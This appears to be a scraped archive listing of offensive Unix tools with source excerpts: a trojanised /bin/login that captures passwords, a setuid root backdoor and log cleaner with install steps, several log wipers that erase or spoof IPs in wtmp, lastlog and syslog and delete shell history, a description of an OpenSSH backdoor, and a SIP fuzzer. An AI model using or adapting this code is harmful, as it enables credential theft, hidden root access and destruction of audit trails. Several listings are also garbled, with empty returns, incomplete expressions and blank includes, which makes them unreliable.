
tl0gin.c

Trojan /bin/login.

/* tl0gin 0.1 (c)oded by m4rc3l0 in 11/09/2002(putz)  *
 *              *
 * Greetz: BashX, roadhouse, sinner, decodi, r0ot, hts,  *
 * midnight, behael, dacker, seed, m4st, mor_PH_eus,  *
 * eSc2, anjinh0, bionatus..        *
 * #DNH, #ESFINGE, #FEANOR at BRASNET      *
 *              *
 * Mail-me: [email protected]      */

   

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/utsname.h>

 
/* Error */
#define ERROR1 "Login incorrect"

/* Arquive */
#define ARQUI "/tmp/.tl0101"

/* Others */
#define MAX 500
#define ERRO -1
#define LOGIN "/bin/login"

/* Forward declarations. banner(), retorna() and grava_arq() are not
 * defined anywhere in the visible listing. grava_arq(login, passwd) is the
 * routine that receives the captured credential pair; ARQUI ("/tmp/.tl0101")
 * is the only file path this file names, so that is presumably where the
 * pair is stored — confirm against the missing body. */
void banner();
void loga();
void retorna();    /* installed as the SIGINT/SIGQUIT handler in main() */
int pega_info();
int grava_arq(char login[100], char passwd[100]);

/* Filled by pega_info() from uname(); nothing in this listing reads them. */
char sys_name[100];
char sys_release[100];

/* Entry point of the trojanised login. Registers retorna() for the
 * keyboard-interrupt signals so the victim cannot break out of the fake
 * prompt, then hands over to loga(), which ends in execl() and does not
 * return. retorna() is declared above but not defined in this listing. */
int main()
{
    FILE *fp; /* never used */

    signal(SIGINT, retorna);
    signal(SIGSTOP, retorna); /* SIGSTOP cannot be caught or ignored; this registration fails */
    signal(SIGQUIT, retorna);

    loga();
   
    return(); /* not valid C (empty return expression): the listing does not compile as published */
}

/* The fake login dialogue. Imitates /bin/login on the controlling terminal,
 * captures a username/password pair, then replaces itself with the real
 * /bin/login so the victim's next attempt succeeds normally.
 * Observable from this code (useful when hunting for this sample):
 *   - prompt is "<hostname> login: " followed by getpass("Password: ");
 *   - every attempt is answered with ERROR1 ("Login incorrect"); the loop
 *     only ends once a username of at least 3 characters was entered;
 *   - the pair goes to grava_arq() (body not in this listing; ARQUI,
 *     "/tmp/.tl0101", is the only file path the program defines);
 *   - the parent process is killed with signal 9 and LOGIN ("/bin/login")
 *     is exec'd with an empty argv[0] and no further arguments. */
void loga() {
    int pid;
    char login[MAX], passwd[MAX], esconde[MAX], hostname[MAX]; /* passwd and esconde are never used */
    char *pass;
   
    pid = getppid();                             /* the process that started us; killed below */
    gethostname(hostname, sizeof(hostname));     /* may be left unterminated if the name fills the buffer */

    for(;;) {
  for(;;) {

      PRIMEIRO:
      banner();                 /* declared above, not defined in this listing */
     
      SEGUNDO:
      printf("%s login: ", hostname);
      fflush(stdout);
      gets(login);              /* unbounded read into a MAX-byte buffer */

      if(strcmp(login, "") != ) /* incomplete expression: this line does not compile as published */
    break;
      else
    goto PRIMEIRO;
  }

      pass = (char *)getpass ("Password: ");    /* pointer into getpass()'s static buffer */
      printf("%s\n\n", ERROR1);                 /* every attempt is reported as a failure */
           
      if(strlen(login) >= 3)
    break;
      else
    goto SEGUNDO;                               /* jumps back into the inner loop's body */
  }
 
  grava_arq(login, pass);                       /* prototype takes char[100]; the buffers here are MAX (500) bytes */
 
  kill(pid, 9);                                 /* SIGKILL to the parent */
  execl(LOGIN, "", NULL);                       /* the genuine login, argv[0] == "" */
}

/* Copies the kernel's sysname and release strings from uname() into the
 * globals sys_name/sys_release. Returns -1 (after perror) when uname()
 * fails; on success control falls off the end without a return statement,
 * so a caller that inspects the result reads an indeterminate value.
 * Nothing in the visible listing calls this function. */
int pega_info() {
    struct utsname info;

    if(uname(&info) == -1) {
  perror("uname");
  return -1;
    }

    sprintf(sys_name, "%s", info.sysname);      /* unbounded copy; utsname fields are normally shorter than 100 bytes, but that is not checked here */
    sprintf(sys_release, "%s", info.release);
}
   

SIP Army Knife

SIP Army Knife is a fuzzer that searches for cross site scripting, SQL injection, log injection, format strings, buffer overflows, and more.

#!/usr/bin/perl
#SIP VoIP Protocol Fuzzer
#Created: Blake Cornell

use strict;
#use warnings; LOTS OF WARNING ____ SOLVE THIS AND INCREASE EFFICIENTY

use IO::Select;
use IO::Socket;
use IO::Socket::INET;
use Getopt::Long;
use Pod::Usage;
use Time::HiRes qw( alarm );
use Digest::MD4 qw( md4_hex );
use Digest::MD5 qw( md5_hex );
use Digest::CRC qw( crc32 crc16 );
use HTML::Entities;

my @timeoutDetection = ();
my @md5Requests = ();
my @md4Requests = ();
my @crc32Requests = ();
my @crc16Requests = ();
my $packetCount = ;
my $socketType='';
my $result = GetOptions('host|h=s' => \(my $host = ''),
      'dport|p=s' => \(my $dport = ''),
      'sport|p=s' => \(my $sport = ''),
      'verbose|v' => \(my $verbose),
      'veryverbose|vv' => \(my $veryVerbose),
      'connection|c' => \(my $connection), #to listen to response or not
      'density|d=s' => \(my $density = ), #determines how many mutations to use
      'timeout|t=s' => \(my $timeout = .1),
      'count' => \(my $countTests = ), #counts the number of packets to test
      'md4' => \(my $md4), #can cause timeouts
      'md5' => \(my $md5), #can cause timeouts
      'crc32' => \(my $crc32), #can cause timeouts
      'crc16' => \(my $crc16), #can cause timeouts
      'start=s' => \(my $startPosition), #if set, then start at this position
      'stringFormats' => \(my $stringFormats),
      'stringOverflows' => \(my $stringOverflows),
      'integerFormats' => \(my $integerFormats),
      'injectHeaders' => \(my $injectHeaders),
      'xss' => \(my $xss),
      'sqli' => \(my $sqli),
      'callId' => \(my $callId), #call id is incremented
      'detectVersion' => \(my $detectVersion),
      'getOptions' => \(my $getOptions),
      'help' => \(my $help),
      'proto=s' => \(my $proto),

Linux Log Eraser

Linux Log Eraser is a set of shell scripts that will cleanly search for specific data in log files and wipe it.

Last Door Log Wiper

Last Door is a utility written to wipe specific entries in arbitrary log files and if setuid, will also execute arbitrary commands without logging any history.

 ___________
|           |Linux
|<Last|Door>|Root-
| --------- |Backdoor
|         O |&
|           |Log-
|           |Cleaner
|___________|~r0ng

Hackers2DevNull.blogspot.co.uk
(The user bears responsibility)

Release Dec 2012 -V1

For a full writeup of the program, please visit my blog, URL above.

[+] What is it?

It is a backdoor program which enables a non-root user to send root commands to system, and a log cleaner with several functions.

[+] Features?

- Hardcoded password, no prompt/blank screen unless correct password entered
- No need for user to SU prior to running
- Protection for virtual file systems
- All commands sent to system as root
- Log cleaner searches the file system for chosen strings, no finite log lists used
- Log cleaner options:
   - Search string replace with new string (e.g. change your ip in the logs)
   - Search string delete string
   - Search string delete line
   - Search string delete file contents
- Multi-string search/destroy at once
- Includes hidden files
- Maintains the file modified date despite making changes
- On running the log cleaner, the process is forked as a background daemon
   - User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.
   - If you don't logout prior to the process starting, the file search process will be displayed
   - If you do logout prior to the process starting this will allow your .bash_history to refresh
     and be included in the search (should you want to delete your ./LastDoor command for example).
[+] Compile/use?

- gcc LastDoor.c -o LastDoor -Wall (all std libs used)
- cp LastDoor /bin/LastDoor (for example)
- chmod u+s /bin/LastDoor (set the s bit)

- non-rootuser:~# /bin/LastDoor (run!)

whitecat.c

WhiteCat log cleaner version 1.0. WhiteCat is designed for any UNIX-like system, but tested only on Linux. Distributed under GPLv2.

/*
 *  This is WhiteCat logcleaner version 1.0 by ShadOS from Hell Knights Crew.
 *  It supports perl compatible regular expressions and cleans any binary and
 *  text log files (just correct source a little). WhiteCat is designed for
 *  any UNIX-like system, but tested only on Linux. Distributed under GPLv2.
 *  Use it only for educational purpose.
 *  Don't forget to visit our site and my homepage for new releases:
 *  http://hellknights.void.ru
 *  http://shados.0x48k.cc
 *  Also, you can mail me any bugs or suggestions:
 *  shados /\./\ real.xakep.ru
 *  shados /\./\ 0x48k.cc
 *
 *  Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2, or (at your option)
 *  any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software Foundation,
 *  Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.  
 */

#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <utmp.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#include <regex.h>
#include <limits.h> /* for PATH_MAX */
#include <getopt.h>


#ifndef UTMP_FILE
    #define UTMP_FILE "/var/run/utmp"
#endif    
#ifndef WTMP_FILE
    #define WTMP_FILE "/var/log/wtmp"
#endif

Guru-Antilog.sh

A bash script to wipe or exchange your IP in unix log files. Also wipes out /root/.bash_history.

#!/bin/bash
# Guru-Antilog V 0.1
# usage : to Exchanging your IP with fake IP y0 choose it
# and to clear your last command's and clear logout history  
# Remember that...
# y0 have one minute to logout from b0x no more.. so be carefull
# Fuck the whitehats
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo "                     Guru-Antilog c0ded  By [ sAFA7_eLNeT ] (SecurityGurus.NeT) - SecurityGurus[AT]irc.dal.net:6667 "
echo "  Greetz g0es to : Acid-WarZ,rOCk-MaStEr,j7a,MedoZero,Spiderz,and all SecurityGurus.NeT PPL and all 1--5.com folks "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ];then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
fi
echo -n " What's the ip y0 want to spoof it ?  "
read word
word=$word
echo -n " What's the Fake ip y0 want  using it ? "
read fake
fake=$fake
r0x="yes"
if [ ! -f /var/log/lastlog ]; then
r0x="no"
echo " i can't find lastlog"
fi
if [ "$r0x" = "yes" ]; then
echo " Editing lastlog"
sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
mv /var/log/lastlog.new /var/log/lastlog
fi
syslog="yes"
if [ ! -f /var/log/syslog ]; then
echo " i can't find syslog"
 syslog="no"
fi
if [ "$syslog" = "yes" ]; then
echo " Editing syslog"
sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
mv /var/log/syslog.new /var/log/syslog
fi
mess="yes"
if [ ! -f /var/log/messages ]; then
 echo " i can't find message "
mess="no"
fi
if [ "$mess" = "yes" ]; then
echo " Editing message"
sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
mv /var/log/messages.new /var/log/messages
fi
http="yes"
if [ ! -f /var/log/httpd/access_log ]; then
 echo " i can't find access_log "

SSHeater

SSHeater is a program that infects the OpenSSH daemon in run-time in order to log all future sessions and implement a backdoor where a single password, chosen by the user, can log into all accounts in the system. There's a log parser included in the package that can display authentication information about sessions as well as play the session just like TTYrec/play.

c1zc0-ban

Simple IPv4 and IPv6 banner grabbing scripts; typically used for telnet/cisco appliances, although they may work on other services.

rsh-v2.c

Unix log cleaner that also checks to see if root is logged in.

/*
rsh-v2 rootshell by rotor http://www.c1zc0.com
irc.efnet.org #c1zc0
usage: ./rshv2
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define PASS "c1zk0"

#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"

/* Forward declarations. Only main() and the beginning of clean_last() are
 * in the visible listing; wtmp_clean() and chkr() (the "is root logged in"
 * check named in the description) are defined elsewhere. */
int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();

/* rsh-v2: password-gated shell that also scrubs one account's login
 * records. argv[1] is the password, argv[2] the account whose lastlog,
 * wtmp and utmp entries are removed. Both rejection paths print a fake
 * "Segmentation fault" so the binary passes for a crashing program.
 * What a defender can observe from this code: a hard-coded password
 * (PASS), setuid(0) calls that only matter if the file is installed setuid
 * root, PS1/HISTFILE removed from the environment, and a bash spawned
 * with argv[0] "sh". */
int main(int argc, char **argv[])   /* char **argv[] is char ***, not the conventional char ** */
{
char *pass = argv[1];   /* NULL when run without arguments */
char *pazz = PASS;      /* hard-coded password from #define PASS above */
struct utsname u;
uname(&u);              /* return value unchecked */

/* argc is 1 or more under normal invocation, so this guard never fires;
 * with no arguments strcmp() below dereferences a NULL pass and the
 * process genuinely crashes instead of printing the decoy message. */
if(argc < 1){
printf("Segmentation fault (core dumped)\n");
exit(0);
}
if(strcmp(pass, pazz)) {
printf("Segmentation fault (core dumped)\n");
exit(0);
} else {
setuid(0);   /* effective only when the binary is setuid root; result unchecked (and repeated) */
setuid(0);
unsetenv("PS1");        /* the spawned shell shows no prompt */
unsetenv("HISTFILE");   /* the spawned shell writes no history file */
printf("Cleaning lastlog!\n");
clean_last(_PATH_LASTLOG, argv[2]);   /* argv[2] is NULL if only the password was given */
printf("Cleaning WTMP\n");
wtmp_clean(_WTMP_PATH, argv[2]);
printf("Cleaning UTMP\n");
wtmp_clean(_UTMP_PATH, argv[2]);
printf("Checking for root logged in\n");
chkr();                 /* defined outside this listing */
printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
printf("Release: %s, Version: %s\n", u.release, u.version);
execl("/bin/bash", "sh", NULL);   /* replaces this process with a shell (root if setuid(0) succeeded), argv[0] == "sh" */
}
return 0;
}

int clean_last(char *path, char *user) {
FILE *lastlog_file;
struct passwd *pwd;
struct lastlog lastlog_tmp;
int count=0;

if((lastlog_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

if ((pwd = getpwnam(user)) == NULL) {
printf("user %s not found\n", user);
return 0;
}

nabi2.c

Nabi version 2.0 - Advanced /var log wiper for Linux.

/*

     Advanced /var log wiper for linux

     nabi ver 2 ( friendly zap2.c )


    Release Date:
    nabi ver 2 - 3.8 2006 (Wed)
         nabi ver 1 - 1.15 2006 (Sun)
 
  1: zap2)
      # ./nabi -z root
  2: history cleanup)
      # ./nabi -h
  3: string change)
      # ./nabi -r 111.111.111.111 222.222.222.222 ( you must make sure both strings are the same length)
      # ./nabi -r 'pts/1' 'tty/0' ( yo ~! )

    Tested on:
      - Debian 3.0r1
      - RH 9.0
      - Fedora core 2
      ..

    CHANGED:
      - add program option parser for split features on this file.
      - erased minor version number of this program.

    BUG FIXED:
      - when you typed "./nabi root 'pts/1' 'pts/2'" you may have gotten an error
        because of the improper slashes in 's/pts/1/pts/2', but now it's okay.
        see escape_slash().
   
  comment:
    i become a curious guy when i'm typing some code. what about you all?
    for more useful toolkit. brb!

   
*/



#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>

#define MAX_PATH        1024
#define MAX_DEPTH       128

#define  PROGRAM      "Nabi ver 2 ( <a href="mailto:[email protected]">[email protected]</a> )"


/*
#define DEBUG
*/


/* Forward declarations; none of these bodies appear in the visible listing.
 * The usage block in the file header maps them to the command-line modes:
 *   -z user  -> zap2_main()       (login-record entries for one user, presumably via utmp/lastlog)
 *   -h       -> history_cleanup()
 *   -r a b   -> exploit(a, b)     (string replacement; both strings must be the same length)
 * escape_slash() is the fix described under BUG FIXED above. */
int insert_node(char *filename);
void load_dir(int cdepth);
void init_list();
void show_list();
void exploit(char *string, char *newstring);
void history_cleanup();
void zap2_main(char *user);
void escape_slash(char *pstr);

/* Singly linked list of files collected by load_dir(); one node per entry,
 * with the directory depth at which it was found. head and tail are the
 * global list ends (maintained by insert_node()/init_list(), presumably —
 * their bodies are outside this listing). */
struct file_list
{
        struct file_list *next;
        int depth;                 /* recursion depth of the directory walk; MAX_DEPTH is the declared limit */
        char d_name[MAX_PATH];     /* entry name as stored by insert_node(); whether it is a full path is not visible here */
} *head, *tail;

static char root_dir[] = "/var";   /* top of the directory tree walked by load_dir() — see the usage block above */

int main(int argc, char *argv[])
{
        struct dirent *dp;
